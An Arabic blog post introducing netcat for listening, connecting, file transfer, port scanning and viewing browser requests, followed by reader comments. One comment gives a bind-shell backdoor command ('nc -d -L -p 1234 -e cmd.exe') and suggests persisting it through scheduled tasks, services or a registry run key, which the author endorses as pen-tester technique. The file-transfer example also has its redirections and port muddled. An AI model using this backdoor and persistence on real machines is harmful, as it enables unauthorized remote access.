netcat أو حسب ما يعرفها خبراء أمن المعلومات swiss knife army هي أداة شبكة متعددة الاستخدامات. netcat كغيرها من الأدوات يمكن استخدمها لأغراض إدارة الشبكة بطريقة سلمية ويمكن استخدامها لأغراض سيئة هذا يخضع للشخص نفسه وغرض استخدامه.
في هذه التدوينة سأتطرق إلى بعض استخدامات ال netcat وأمثلة عليها.
إحدى أهمّ ميزات netcat هي أنه يمكن استخدامها كمستمع (خادم) أو كمتصل (عميل).
طريقة استخدامها كمستمع
nc -l [port_num]
-l تعني وضع netcat في وضع الاستماع ال -l تعني listening.
[port_num] رقم المنفذ الذي يتم استخدامه في الاستماع
لنفرض أننا نريد الاستماع على المنفذ 8080 يصبح الأمر كالتالي:
nc -l 8080
الان باستخدام netcat كمتصل نقوم بالاتصال على المستمع اعلاه كالتالي
nc ip_address 8080
استخدام netcat في نقل الملفات
باستخدام الطريقة المذكورة اعلاه يمكن استخدام netcat لنقل الملفات بالشكل التالي
لنفرض أن لدينا الحاسوب واحد عنوانه هو 172.16.1.5 والحاسوب اثنين عنوانه 172.16.1.100
ونريد أن نقوم بنقل الملف mtafran.com من واحد إلى اثنين
نقوم بإنشاء مستمع على حاسوب اثنين كالتالي
nc -l 8080 < mtafran.com
نقوم بإنشاء متصل على حاسوب واحد كالتالي
nc 172.16.1.100 > mtafran.com
إشارة > تعني توجيه ما يتم استلامه على المنفذ 8080 على الحاسوب انثنين إلى ملف اسم mtafran.com
إشارة < تعني توجيه محتوى الملف إلى الاتصال nc 172.16.1.100
netcat كماسح منافذ (port scanner)
nc -z 172.16.1.5 20-100
-z تعني صفر I/O بدونها عند الاتصال بالمنافذ سينتظر netcat ردّاً من الحاسوب الممسوح وهو ما يعني توقف عملية المسح لحين ادخال رد أو إنهاء العملية.
لاستخدامه لمعرفة المتصفحات المستخدم
nc -lv 8080
-v تعني طبع المخرجات بمعني اظهار المخرجات على شاشة الحاسوب
الان من أحد المتصفحات يمكنك زيارة العنوان كالتالي
http://172.16.1.100:8080
راقب الشاشة وستشاهد معلومات حول المتصفح الذي استخدامه في الاتصال ب netcat.
هذه فقط عبارة عن مقدمة سريعة لم لامست فقط قمة الجليد في جبل ال netcat
بارك الله فيك أخي الباحث
يمكن أيضاً استخدامها كـ Backdoor وذلك بعمل الإيعاز التالي من جهاز A
nc -d -L -p 1234 -e cmd.exe
بهذا الأمر أنت تسمح لمن سيعمل الإتصال معك بالدخول إلى CLI عبر 1234
جهاز B سينفذ الأمر التالي :
nc -ip_add 1234
بعدها سيجد نفسه في جهاز A .
ويمكن دمجها من خلال المهام المجدولة عبر الأمر at ، واضافتها كـ Service من خلال الأمر sc ، أو إضافته كمفتاح Registry ينفذ الأمر كلما أعاد التشغيل والكثير الكثير الكثير …
جزاك الله خيراً كثيراُ أخي أبوعابد الإضافة التي تفضّلت بها هامّة جدّاً ولكن لم أشأ التطرق إليها حتى لا يساء استخدامها من قبل البعض. نقطة إضافتها كخدمة رائعة ولكن يفضل من خلال schtasks وليس at وسيأتي بيان السبب لاحقاً إن شاء الله.
النقاط الأكثر من رائعة التي ذكرتها أخي أبوعابد هي جزء أساسي من ترسانة ال pen testers.
أشكرك جدّاً.
رائع أخي الباحث
هذا الأمر جديد بالنسبة لي schtasks ويبدو لي أنه أقوى من at
بانتظار توضيحك حول تفضيلك لـ schtasks عن at
تحيتي لك